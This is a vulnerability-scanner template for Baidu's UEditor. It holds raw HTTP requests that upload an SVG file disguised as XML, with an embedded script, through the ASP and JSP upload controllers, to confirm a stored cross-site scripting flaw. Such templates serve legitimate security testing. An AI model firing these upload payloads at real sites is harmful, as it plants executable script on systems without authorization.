id: ueditor-xss

info:
  name: UEditor XSS
  author: qwtd
  severity: medium
  verified: true
  description: |
    UEditor 是由百度 web 前端研发部开发所见即所得富文本web编辑器，具有轻量、可定制、注重用户体验等特点。UEditor文件上传接口允许上传xml文件，可导致存储型跨站脚本攻击。

set:
  hostname: request.url.host

rules:
  r0:
    request:
      raw: |
        POST /ueditor/asp/controller.asp?action=uploadfile HTTP/1.1
        Host: {{hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; rv 11.0) like Gecko
        Cookie: PSY_Message=%E5%8F%8B%E6%83%85%E6%8F%90%E7%A4%BA%7C%E6%82%A8%E7%9A%84%E5%AD%A6%E5%8F%B7%E3%80%81%E7%94%A8%E6%88%B7%E5%90%8D%E3%80%81%E5%A7%93%E5%90%8D%E6%88%96%E8%80%85%E5%AF%86%E7%A0%81%E8%BE%93%E5%85%A5%E4%B8%8D%E5%AF%B9%EF%BC%81;PSY_memID=;PSY_memPassword=;PSY=;ASPSESSIONIDACQQCDTS=EKOHFJLCNCGDGGCHCOKCDGFH;
        Accept: */*
        Accept-Encoding: gzip,deflate
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundary636a3143
        Content-Length: 578


        ------WebKitFormBoundary636a3143
        Content-Disposition: form-data; name="upfile"; filename="ceshi.xml"
        Content-Type: application/vnd.ms-excel

        <?xml version="1.0" standalone="no"?>
        <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
        <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
          <rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
          <script type="text/javascript">
          alert(document.domain);
          </script>
        </svg>
        ------WebKitFormBoundary636a3143--
    expression: response.status == 200 && response.body.bcontains(b'ceshi.xml') && response.body.bcontains(b'SUCCESS')

  r1:
    request:
      raw: |
        POST /ueditor/jsp/controller.jsp?action=uploadfile HTTP/1.1
        Host: {{hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; rv 11.0) like Gecko
        Cookie: PSY_Message=%E5%8F%8B%E6%83%85%E6%8F%90%E7%A4%BA%7C%E6%82%A8%E7%9A%84%E5%AD%A6%E5%8F%B7%E3%80%81%E7%94%A8%E6%88%B7%E5%90%8D%E3%80%81%E5%A7%93%E5%90%8D%E6%88%96%E8%80%85%E5%AF%86%E7%A0%81%E8%BE%93%E5%85%A5%E4%B8%8D%E5%AF%B9%EF%BC%81;PSY_memID=;PSY_memPassword=;PSY=;ASPSESSIONIDACQQCDTS=EKOHFJLCNCGDGGCHCOKCDGFH;
        Accept: */*
        Accept-Encoding: gzip,deflate
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundary636a3143
        Content-Length: 578


        ------WebKitFormBoundary636a3143
        Content-Disposition: form-data; name="upfile"; filename="ceshi.xml"
        Content-Type: application/vnd.ms-excel

        <?xml version="1.0" standalone="no"?>
        <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
        <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
          <rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
          <script type="text/javascript">
          alert(document.domain);
          </script>
        </svg>
        ------WebKitFormBoundary636a3143--
    expression: response.status == 200 && response.body.bcontains(b'ceshi.xml') && response.body.bcontains(b'SUCCESS')
expression: r0() || r1()